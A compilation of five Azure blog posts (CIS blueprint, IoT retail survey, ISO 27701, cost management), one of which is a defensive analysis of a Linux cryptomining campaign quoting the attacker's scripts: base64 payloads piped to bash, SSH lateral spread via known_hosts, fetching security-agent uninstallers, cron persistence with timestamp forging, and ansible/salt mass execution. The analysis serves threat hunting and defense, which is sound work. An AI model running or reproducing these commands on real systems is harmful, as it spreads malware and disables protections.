Kategorie: Microsoft Azure

New Azure blueprint for CIS Benchmark

We’ve released our newest Azure blueprint that maps to another key industry-standard, the Center for Internet Security (CIS) Microsoft Azure Foundations Benchmark. This follows the recent announcement of our Azure blueprint for FedRAMP moderate and adds to the growing list of Azure blueprints for regulatory compliance, which now includes ISO 27001, NIST SP 800-53, PCI-DSS, UK OFFICIAL, UK NHS, and IRS 1075.

Azure Blueprints is a free service that enables cloud architects and central information technology groups to define a set of Azure resources that implements and adheres to an organization's standards, patterns, and requirements. Azure Blueprints makes it possible for development teams to rapidly build and stand up new trusted environments within organizational compliance requirements. Customers can apply the new CIS Microsoft Azure Foundations Benchmark blueprint to new subscriptions as well as existing environments.

CIS benchmarks are configuration baselines and best practices for securely configuring a system developed by CIS, a nonprofit entity whose mission is to ”identify, develop, validate, promote, and sustain best practice solutions for cyber defense.” A global community collaborates in a consensus-based process to develop these internationally recognized security standards for defending IT systems and data against cyberattacks. Used by thousands of businesses, they offer prescriptive guidance for establishing a secure baseline system configuration. System and application administrators, security specialists, and others who develop solutions using Microsoft products and services can use these best practices to assess and improve the security of their applications.

Each of the CIS Microsoft Azure Foundations Benchmark recommendations are mapped to one or more of the 20 CIS Controls that were developed to help organizations improve their cyber defense. The blueprint assigns Azure Policy definitions to help customers assess their compliance with the recommendations. Major elements of all nine sections of the recommendations from the CIS Microsoft Azure Foundation Benchmark v1.1.0 include:

Identity and Access Management (1.0)

Assigns Azure Policy definitions that help you monitor when multi-factor authentication isn't enabled on privileged Azure Active Directory accounts.
Assigns an Azure Policy definition that helps you monitor when multi-factor authentication isn't enabled on non-privileged Azure Active Directory accounts.
Assigns Azure Policy definitions that help you monitor for guest accounts and custom subscription roles that may need to be removed.

Security Center (2.0)

Assigns Azure Policy definitions that help you monitor networks and virtual machines where the Security Center standard tier isn't enabled.
Assigns Azure Policy definitions that helps you ensure that virtual machines are monitored for vulnerabilities and remediated, endpoint protection is enabled, system updates are installed on virtual machines.
Assigns an Azure Policy definition that helps you ensure virtual machine disks are encrypted.

Storage Accounts (3.0)

Assigns an Azure Policy definition that helps you monitor storage accounts that allow insecure connections.
Assigns an Azure Policy definition that helps you monitor storage accounts that allow unrestricted access.
Assigns an Azure Policy definition that helps you monitor storage accounts that don't allow access from trusted Microsoft services.

Database Services (4.0)

Assigns an Azure Policy definition that helps ensure SQL Server auditing is enabled as well as properly configured, and logs are retained for at least 90 days.
Assigns an Azure Policy definition that helps you ensure advanced data security notifications are properly enabled.
Assigns an Azure Policy definition that helps you ensure that SQL Servers are configured for encryption and other security settings.

Logging and Monitoring (5.0)

Assigns Azure Policy definitions that help you ensure a log profile exists and is properly configured for all Azure subscriptions, and activity logs are retained for at least one year.

Networking (6.0)

Assigns an Azure Policy definition that helps you ensure Network Watcher is enabled for all regions where resources are deployed.

Virtual Machines (7.0)

Assigns an Azure Policy definition that helps you ensure disk encryption is enabled on virtual machines.
Assigns an Azure Policy definition that helps you ensure that only approved virtual machine extensions are installed.
Assigns Azure Policy definitions that help you ensure that system updates are installed, and endpoint protection is enabled on virtual machines.

Other Security Considerations (8.0)

Assigns an Azure Policy definition that helps you ensure that key vault objects are recoverable in the case of accidental deletion.
Assigns an Azure Policy definition that helps you ensure role-based access control is used to managed permissions in Kubernetes service clusters

AppService (9.0)

Assigns an Azure Policy definition that helps you ensure web applications are accessible only over secure connections.
Assigns Azure Policy definitions that help you ensure web applications are only accessible using HTTPS, use the latest version of TLS encryption, and are only reachable by clients with valid certificates.
Assigns Azure Policy definitions to ensure that .Net Framework, PHP, Python, Java, and HTTP versions are the latest.

Azure customers seeking to implement compliance with CIS Benchmarks should note that although this Azure Blueprint may help customers assess compliance with particular configuration recommendations, it does not ensure full compliance with all requirements of the CIS Benchmark and CIS Controls. In addition, recommendations are associated with one or more Azure Policy definitions, and the compliance standard includes recommendations that aren't addressed by any Azure Policy definitions in blueprints at this time. Therefore, compliance in Azure Policy will only consist of a partial view of your overall compliance status.  Customers are ultimately responsible for meeting the compliance requirements applicable to their environments and must determine for themselves whether particular information helps meet their compliance needs.

Learn more about the CIS Microsoft Azure Foundation Benchmark blueprint in our documentation.
Quelle: Azure

Learning from cryptocurrency mining attack scripts on Linux

Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers. In the past, we've talked about how some attackers use brute force techniques to guess account names and passwords and use those to gain access to machines. Today, we're talking about an attack that a few of our customers have seen where a service is exploited to run the attackers code directly on the machine hosting the service.

This attack is interesting for several reasons. The attacker echoes in their scripts so we can see what they want to do, not just what executes on the machine. The scripts cover a wide range of possible services to exploit so they demonstrate how far the campaign can reach. Finally, because we have the scripts themselves, we can pull out good examples from the Lateral Movement, Defense Evasion, Persistence, and Objectives sections of the Linux MITRE ATT&CK Matrix and use those to talk about hunting on your own data.

Initial vector

For this attack, the first indication something is wrong in the audited logs is an echo command piping a base64 encoded command into base64 for decoding then piping into bash. Across our users, this first command has a parent process of an application or service exposed to the internet and the command is run by the user account associated with that process. This indicates the application or service itself was exploited in order to run the commands. While some of these accounts are specific to a customer, we also see common accounts like Ubuntu, Jenkins, and Hadoop being used. 

/bin/sh -c "echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYm

luOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K<snip>CmRvbm

UK|base64 -d|bash"

Scripts

It is worth taking a brief aside to talk about how this attacker uses scripts. In this case, they do nearly everything through base64 encoded scripts. One of the interesting things about those scripts is they start with the same first two lines: redirecting both the standard error and standard output stream to /dev/null and setting the path variable to locations the attacker knows generally hold the system commands they want to run. 

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

This indicates that when each of them is base64 encoded, the first part of the encoding is the same every time.

ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYm

luOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K

The use of the same command is particularly helpful when trying to tie attacks together across a large set of machines. The scripts themselves are also interesting because we can see what the attacker intended to run. As defenders, it can be very valuable to look at attacker scripts whenever you can so you can see how they are trying to manipulate systems. For instance, this attacker uses a for loop to cycle through different possible domain names. This type of insight gives defenders more data to pivot on during an investigation.

for h in onion.glass civiclink.network tor2web.io onion.sh onion.mn onion.in.net onion.to
do
if ! ls /proc/$(cat /tmp/.X11-unix/01)/io; then
x t<snip>v.$h
else
break
fi
done

We observed this attacker use over thirty different encoded scripts across a number of customers, but they boiled down to roughly a dozen basic scripts with small differences in executable names or download sites. Within those scripts are some interesting examples that we can tie directly to the MITRE ATT&CK Matrix for Linux.

Lateral Movement

While it isn’t the first thing the attacker does, they do use an interesting combination Discovery (T1018: Remote System Discovery) and Lateral Movement (T1021: Remote Services) techniques to infect other hosts. They grep through the files .bash_history, /etc/hosts, and .ssh/known_hosts looking for IP addresses. They then attempt to pass their initial encoded script into each host using both the root account and the account they compromised on their current host without a password. Note, the xssh function appears before the call in the original script. 

hosts=$(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" ~/.bash_history /etc/hosts ~/.ssh/known_hosts |awk -F: {'print $2'}|sort|uniq ;awk {'print $1'} $HOME/.ssh/known_hosts|sort|uniq|grep -v =|sort|uniq)
for h in $hosts;do xssh root $h; xssh $USER $h & done
——
xssh() {
ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no $1@$2 'echo ZXhlYyA<snip>KZG9uZQo=|base64 -d|bash'
}

In each case, after the initial foothold is gained, the attacker uses a similar set of Defense Evasion techniques.

Defense Evasion

Over various scripts, the attacker uses the T1107: File Deletion, T1222: File and Directory Permissions Modification, and T1089: Disabling Security Tools techniques, as well as the obvious by this point, T1064: Scripting.

In one script they first they make a randomly named file:

z=./$(date|md5sum|cut -f1 -d" ")

After they download their executable into that file, they modify the downloaded file for execution, run it, then delete the file from disk:

chmod +x $z;$z;rm -f

In another script, the attacker tries to download then run uninstall files for the Alibaba Cloud Security Server Guard and the AliCloud CloudMonitor service (the variable $w is set as a wget command earlier in the script).

$w update.aegis.aliyun.com/download/uninstall.sh|bash
$w update.aegis.aliyun.com/download/quartz_uninstall.sh|bash
/usr/local/qcloud/stargate/admin/uninstall.sh

Persistence

Once the coin miner is up and running, this attacker uses a combination of T1168: Local Job Scheduling and T1501: Systemd Service scheduled tasks for persistence. The below is taken from another part of a script where they echo an ntp call and one of their base64 encoded scripts into the file systemd-ntpdate then add a cron job to run that file. The encoded script here is basically the same as their original script that started off the intrusion.

echo -e "#x21/bin/bashnexec &>/dev/nullnntpdate ntp.aliyun.comnsleep $((RANDOM % 600))necho ZXhlYyAmPi9<snip>2gKZmkK|base64 -d|bash" > /lib/systemd/systemd-ntpdate
echo "0 * * * * root /lib/systemd/systemd-ntpdate" > /etc/cron.d/0systemd-ntpdate
touch -r /bin/grep /lib/systemd/systemd-ntpdate
touch -r /bin/grep /etc/cron.d/0systemd-ntpdate
chmod +x /lib/systemd/systemd-ntpdate

Objectives

As previously mentioned, the main objective of this attacker is to get a coin miner started. They do this in the very first script that is run using the T1496: Resource Hijacking tactic. One of the interesting things about this attack is that while they start by trying to get the coin miner going with the initially compromised account, one of the subsequent scripts attempts to get it started using commands from different pieces of software (T1072: Third-party Software).

ansible all -m shell -a 'echo ZXh<snip>uZQo=|base64 -d|bash'
knife ssh 'name:*' 'echo ZXh<snip>uZQo=|base64 -d|bash'
salt '*' cmd.run 'echo ZXh<snip>ZQo=|base64 -d|bash'

Hunting

ASC Linux customers should expect to see coin mining or suspicious download alerts from this type of activity, but what if you wanted to hunt for it yourself? If you use the above script examples, there are several indicators you could follow up on, especially if you have command line logging. 

Do you see unexpected connections to onion and tor sites?
Do you see unexpected ssh connections between hosts?
Do you see an increase in activity from a particular user?
Do you see base64 commands echoed, decoded, then piped into bash? Any one of those could be suspicious depending on your own network.
Check your cron jobs, do you see wgets or base64 encoded lines there?
Check the services running on your machines, do you see anything unexpected?
In reference to the Objectives section above, do you see commands for pieces of software you don’t have installed?

Azure Sentinel can help with your hunting as well. If you are an Azure Security Center customer already, we make it easy to integrate into Azure Sentinel.

Defense

In addition to hunting, there are a few things you can do to defend yourself from these types of attacks. If you have internet-facing services, make sure you are keeping them up to date, are changing any default passwords, and taking advantage of some of the other credential management tools Azure offers like just-in-time (JIT), password-less sign-in, and Azure Key Vault. Monitor your Azure machine utilization rates; an unexpected increase in usage could indicate a coin miner. Check out other ideas at the Azure Security Center documentation page. 

Identifying attacks on Linux systems

Coin miners represent a continuing threat to machines exposed to the internet. While it's generally easy to block a known-bad IP or use a signature-based antivirus, by studying attacker tactics, techniques, and procedures, defenders can find new and more reliable ways to protect their environments.

While we talk about a specific coin miner attacker in this post, the basic techniques highlighted above are used by many different types of attackers of Linux systems. We see Lateral movement, Defense Evasion, and Persistence techniques similar to the above used by different attackers regularly and are continually adding new detections based on our investigations.
Quelle: Azure

IoT Signals retail report: IoT’s promise for retail will be unlocked addressing security, privacy and compliance

Few industries have been disrupted by emerging technology quite like retail. From exploding online sales to the growth of mobile shopping, the industry has made a permanent shift to accommodate digital consumers.

The rise of IoT has forced the retail industry to take notice; IDC expects that by 2025 there will be 41.6 billion connected IoT devices or ‘things,’ generating more than 79 zettabytes (ZB) of data. These billions of devices are creating unprecedented visibility into a business, leading to transformation of operations, from the supply chain to automated checkout, personalized discounts, smart shelves, and other advances powered by IoT. In fact, IoT can help brick-and-mortar stores create customer experiences that rival that of online stores; for instance, customers can be sent alerts about discounts relevant to them when they get close to a store, and those stores can use IoT to keep track of inventory and increase efficiency.

Today we're sharing a new IoT Signals report focused on the retail industry that provides an industry pulse on the state of IoT adoption to help inform how we better serve our partners and customers, as well as help retail leaders develop their own IoT strategies. We surveyed 168 decision makers in enterprise retail organizations to deliver an industry-level view of the IoT ecosystem, including adoption rates, related technology trends, challenges, and benefits of IoT.

The study found that while IoT is almost universally adopted in retail and considered critical to success, companies are challenged by compliance, privacy concern, and skills shortages. To summarize the findings:

Retail IoT is strong and improving customer experience is a growth opportunity. Retailers’ future planning focuses on IoT projects that help customers get in and out quickly, which increases revenue. Areas like automated checkout and optimizing inventory and layout are key, and survey respondents rank store analytics (57 percent) and supply chain optimization and inventory tracking (48 percent) as the top two IoT use cases.
AI is integral to IoT and retailers who incorporate it achieve greater IoT success. For many retail IoT decision makers (44 percent), AI is a core component of their IoT solutions. Furthermore, retailers who leverage AI say they are able to use their IoT solutions more quickly and more fully. They also plan to use IoT even more in the future than those not integrating AI. Those surveyed who use AI as a core part of their solutions are more likely to use it for layout optimization, digital signage, smart shelving, and in-store contextualized marketing (including beacons).
Across regions, unique retail benefits and challenges emerge around IoT, but all are committed. Globally, IoT is being widely adopted in retail, with the survey respondents in the US, UK, and France all reporting 92 percent IoT in adoption. In the US, IoT is often utilized for security and store analytics (65 percent each), while store analytics (49 percent) and supply chain and store optimization (43 percent) are more popular uses in Europe. Despite a variety of adoption barriers across regions, retailers are dedicated to overcoming challenges and leveraging IoT even more in the future.
IoT is seen as critical to retail business success. Nearly 9 in 10 (87 percent) surveyed consider IoT as critical to their business success. Looking forward, respondents believe the biggest benefits they will see from IoT adoption include increased efficiency (69 percent), cost savings (64 percent), increased competitive advantage (62 percent), and new revenue streams (56 percent).
The biggest barriers to success for retailers include budget, privacy concerns, compliance challenges, and talent. In the US, the top three concerns of retailers surveyed are a lack of budget, consumer privacy concerns, and lack of technical knowledge. In Europe, compliance and regulatory challenges top the list, followed by human resources and timing and deployment issues. Despite these challenges, the future of IoT looks bright, with 82 percent of US and 73 percent of European respondents anticipating greater IoT implementation in the future.

Microsoft is leading the charge to address these IoT challenges

We're committed to helping retail customers bring their vision to life with IoT, and this starts with simplifying and securing IoT. Our customers are embracing IoT as a core strategy to drive better business outcomes, and we are heavily investing in this space committing $5 billion in IoT and intelligent edge innovation by 2022 and growing our IoT and intelligent edge partner ecosystem to over 10,000.

We're dramatically simplifying IoT to enable every business on the planet to benefit. We have the most comprehensive and complete IoT platform and are going beyond that to simplify IoT. Some key examples include Azure IoT Central, which enables customers and partners to provision an IoT app in seconds, customize it in hours, and go to production the same day. To help ensure that retailers have a robust talent pool of IoT developers, we've developed both an IoT School and an AI School, which provides free training for common application patterns and deployments.

Security is crucial for trust and integrity in IoT cloud- and edge-connected devices because they may not always be in trusted custody. Azure Sphere takes a holistic security approach from silicon to cloud, providing a highly secure solution for connected microcontroller units (MCUs), which go into devices ranging from connected home devices to medical and industrial equipment. Azure Security Center provides unified security management and advanced threat protection for systems running in the cloud and on the edge.

Finally, we’re helping our retail customers leverage their IoT investments with AI at the intelligent edge. Azure IoT Edge enables customers to distribute cloud intelligence to run in isolation on IoT devices directly and Azure Databox Edge builds on Azure IoT Edge and adds virtual machine and mass storage support. Going forward, Azure Digital Twins (currently in preview) will enable retailers to create complete virtual models of physical environments, making it easy to unlock insights into their retail environments.

When IoT is foundational to a retailer’s transformation strategy, it can have a significantly positive impact on the bottom line, customer experiences, and products. We are invested in helping our partners, customers, and the broader industry to take the necessary steps to address barriers to success. Read the full IoT Signals Retail Report and learn how we are helping retailers embrace the future and unlock new opportunities with IoT.
Quelle: Azure

Azure is now certified for the ISO/IEC 27701 privacy standard

We are pleased to share that Azure is the first major US cloud provider to achieve certification as a data processor for the new international standard ISO/IEC 27701 Privacy Information Management System (PIMS). The PIMS certification demonstrates that Azure provides a comprehensive set of management and operational controls that can help your organization demonstrate compliance with privacy laws and regulations. Microsoft’s successful audit can also help enable Azure customers to build upon our certification and seek their own certification to more easily comply with an ever-increasing number of global privacy requirements.

Being the first major US cloud provider to achieve a PIMS certification is the latest in a series of privacy firsts for Azure, including being the first to achieve compliance with EU Model clauses. Microsoft was also the first major cloud provider to voluntarily extend the core data privacy rights included in the GDPR (General Data Protection Regulation) to customers around the world.

PIMS is built as an extension of the widely-used ISO/IEC 27001 standard for information security management, making the implementation of PIMS’s privacy information management system a helpful compliance extension for the many organizations that rely on ISO/IEC 27001, as well as creating a strong integration point for aligning security and privacy controls. PIMS accomplishes this through a framework for managing personal data that can be used by both data controllers and data processors, a key distinction for GDPR compliance. In addition, any PIMS audit requires the organization to declare applicable laws/regulations in its criteria for the audit meaning that the standard can be mapped to many of the requirements under GDPR, CCPA (California Consumer Privacy Act), or other laws. This universal framework allows organizations to efficiently operationalize compliance with new regulatory requirements.

PIMS also helps customers by providing a template for implementing compliance with new privacy regulations, helping reduce the need for multiple certifications and audits against new requirements and thereby saving both time and money. This will be critical for supply chain business relationships as well as cross-border data movement. 

This short video demonstrates how Microsoft complies with ISO/IEC 27701 and our compliance benefits customers. 

Schellman & Company LLC issued a certificate of registration for ISO/IEC 27701:2019 that covers the requirements, controls, and guidelines for implementing a privacy information security management system as an extension to ISO/IEC 27001:2013 for privacy management as a personally identifiable information (PII) processor relevant to the information security management system supporting Microsoft Azure, Dynamics, and other online services that are deployed in Azure Public, Government cloud, and Germany Cloud, including their development, operations, and infrastructures and their associated security, privacy, and compliance per the statement of applicability version 2019-02. A copy of the certification is available on the Service Trust Portal.

Modern business is driven by digital transformation, including the ability to deeply understand data and unlock the power of big data analytics and AI. But before customers – and regulators – will allow you to leverage this data, you must first win their trust. Microsoft simplifies this privacy burden with tools that can help you automate privacy, including built-in controls like PIMS. 

Microsoft has longstanding commitments to privacy, and we continue to take steps to give customers more control over their data. Our Trusted Cloud is built on our commitments to privacy, security, transparency, and compliance, and our Trust Center provides access to validated audit reports, data management capabilities, and information about the number of legal demands we received for customer data from law enforcement.
Quelle: Azure

Azure Cost Management 2019 year in review

When we talk about cost management, we focus on three core tenets:

Ensuring cost visibility so everyone is aware of the financial impact their solutions have.
Driving accountability throughout the organization to stop bad spending patterns.
Continuous cost optimization as your usage changes over time to do more with less.

These were the driving forces in 2019 as we set out to build a strong foundation that pulls together all costs across all account types and ensures everyone in the organization has a means to report on, control, and optimize costs. Our ultimate goal is to empower you to lead a healthier, more financially responsible organization.

All costs behind a single pane of glass

On the heels of the Azure Cost Management preview, 2019 started off strong with the general availability of Enterprise Agreement (EA) accounts in February and pay-as-you-go (PAYG) in April. At the same time, Microsoft as a whole embarked on a journey to modernize the entire commerce platform with the new Microsoft Customer Agreement (MCA), which started rolling out for enterprises in March, pay-as-you-go subscriptions in July, and Cloud Solution Providers (CSP) using Azure plan in November. Whether you get Azure through the Microsoft field, directly from Azure.com, or through a Microsoft partner, you have the power of Azure Cost Management at your fingertips. But getting basic coverage of your Azure usage is only part of the story.

To effectively manage costs, you need all costs together, in a single repository. This is exactly what Azure Cost Management brings you. From the unprecedented ability to monitor Amazon Web Services (AWS) costs within the Azure portal in May (a first for any cloud provider), to the inclusion of reservation and Marketplace purchases in June, Azure Cost Management enables you to manage all your costs from a single pane of glass, whether you're using Azure or AWS.

What's next?

Support for Sponsorship and CSP subscriptions not on an Azure plan are at the top of the list to ensure every Azure subscription can use Azure Cost Management. AWS support will become generally available and then Google Cloud Platform (GCP) support will be added.

Making it easier to report on and analyze costs

Getting all costs in one place is only the beginning. 2019 also saw many improvements that help you report on and analyze costs. You were able to dig in and explore costs with the 2018 preview, but the only way to truly control and optimize costs is to raise awareness of current spending patterns. To that end, reporting in 2019 was focused on making it easier to customize and share.

The year kicked off with the ability to pin customized views to the Azure portal dashboard in January. You could share links in May, save views directly from cost analysis in August, and download charts as an image in September. You also saw a major Power BI refresh in October that no longer required classic API keys and added reservation details and recommendations. Each option helps you not only save time, but also starts that journey of driving accountability by ensuring everyone is aware of the costs they're responsible for.

Looking beyond sharing, you also saw new capabilities like forecasting costs in June and switching between currencies in July, simpler out-of-the-box options like the new date picker in May and invoice details view in September, and changes that simply help you get your job done the way you want to like support for the Azure portal dark theme and continuous accessibility improvements throughout the year.

From an API automation and integration perspective, 2019 was also a critical milestone as EA cost and usage APIs moved to Azure Resource Manager. The Resource Manager APIs are forward-looking and designed to minimize your effort when it comes time to transition to Microsoft Customer Agreement by standardizing terminology across account types. If you haven't started the migration to the Resource Manager APIs, make that your number one resolution for the new year!

What's next?

2020 will continue down this path, from more flexible reporting and scheduling email notifications to general improvements around ease of use and increased visibility throughout the Azure portal. Power BI will get Azure reservation and Hybrid Benefit reports as well as support for subscription and resource group users who don't have access to the whole billing account. You can also expect to see continued API improvements to help make it easier than ever to integrate cost data into your business systems and processes.

Flexible cost control that puts the power in your hands

Once you understand what you're spending and where, your next step is to figure out how to stop the bad spending patterns and keep costs under control. You already know you can define budgets to get notified about and take action on overages. You decide what actions you want to take, whether that be as simple as an email notification or as drastic as deleting all your resources to ensure you won't be charged. Cost control in 2019 was centered on helping you stay on top of your costs and giving you the tools to control spending as you see fit.

This started with a new, consolidated alerts experience in February where you can see all your invoice, credit, and budget overage alerts in a single place. Budgets were expanded to support new account types we talked about above, and to support management groups in June giving you a view of all your costs across subscriptions. Then in August, you were able to create targeted budgets with filters for fine-grained tracking, whether that be for an entire service, a single resource, or an application that spans multiple subscriptions (via tags). This also came with an improved experience when creating budgets to help you better estimate what your budget should be based on historical and forecasted trends.

What's next?

2020 will take cost control to the next level by allowing you to split shared costs with cost allocation rules and define an additional markup for central teams who typically run on overhead or don't want to expose discounts to the organization. We're also looking at improvements around management groups and tags to give you more flexibility to manage costs the way you need to for your organization.

New ways to save and do more with less

Cloud computing comes with a lot of promises, from flexibility and speed to scalability and security. The promise of cost savings is often the driving force behind cloud migrations, yet is also one of the more elusive to achieve. Luckily, Azure delivers new cost optimization opportunities nearly every month! This is on top of the recommendations offered by Azure Advisor, which are specifically tuned to save money on the resources you already have deployed. Here are a few of the over two dozen new cost saving opportunities you saw in 2019:

New pricing options for virtual machines, SQL databases, Azure Monitor, Azure DevOps, and Azure Search.
Reduced prices for services you're already using, like Azure Archive Storage, Azure App Service, Azure Container Instances, Content Delivery Network, and Azure AD B2C.
Promotional pricing for new virtual machine, App Service, and Azure Front Door Service offers.
New features with lower prices for running multiple workloads, like Azure Dedicated Host and Azure SQL Database instance pools.
Expanded set of Azure reservation offers – now available for 16 services.
More flexible ways to pay for reservations with monthly payment options.
New and updated recommendations in Azure Advisor, like improved right-sizing recommendations.

What's next?

Expect to see continued updates in these areas through 2020. We're also partnering with individual service teams to deliver even more built-in recommendations for database, storage, and PaaS services, just to name a few.

Streamlined account and subscription management

Throughout 2019, you may have noticed a lot of changes to Cost Management + Billing in the Azure portal. What was purely focused on PAYG subscriptions in early 2018 became a central hub for billing administrators in 2019 with full administration for MCA accounts in March, new EA account management capabilities in July, and subscription provisioning and transfer updates in August. All of these are helping you get one step closer to having a single portal to manage every aspect of your account.

What's next?

2020 will be the year of converged and consolidated experiences for Cost Management + Billing. This will start with the Billing and Cost Management experiences within the Azure portal and will expand to include capabilities you're currently using the EA, Account, or Cloudyn portals for today. Whichever portal you use, expect to see all these come together into a single, consolidated experience that has more consistency across account types. This will be especially evident as your account moves from the classic EA, PAYG, and CSP programs to Microsoft Customer Agreement (and Azure plan), which is fully managed within the Azure portal and offers critical new billing capabilities, like finer-grained access control and grouping subscriptions into separate invoices.

Looking forward to another year

The past 12 months have been packed with one improvement after another, and we're just getting started! We couldn't list them all here, but if you only take one thing away, please do check out and subscribe to the Azure Cost Management monthly updates for the latest news on what's changed and what's coming. We've already talked about what you can expect to see in 2020 for each area, but the key takeaway is:

2020 will bring one experience to manage all your Azure, AWS, and GCP costs from the Azure portal, with simpler, yet more powerful cost reporting, control, and optimization tools that help you stay more focused on your mission.

We look forward to hearing your feedback as these new and updated capabilities become available. And if you're interested in the latest features, before they're available to everyone, check out Azure Cost Management Labs (introduced in July) and don’t hesitate to reach out with any feedback. Cost Management Labs gives you a direct line to the Azure Cost Management engineering team and is the best way to influence and make an immediate impact on features being actively developed and tuned for you.

Follow @AzureCostMgmt on Twitter and subscribe to the YouTube channel for updates, tips, and tricks! And, as always, share your ideas and vote up others in the Cost Management feedback forum. See you in 2020!
Quelle: Azure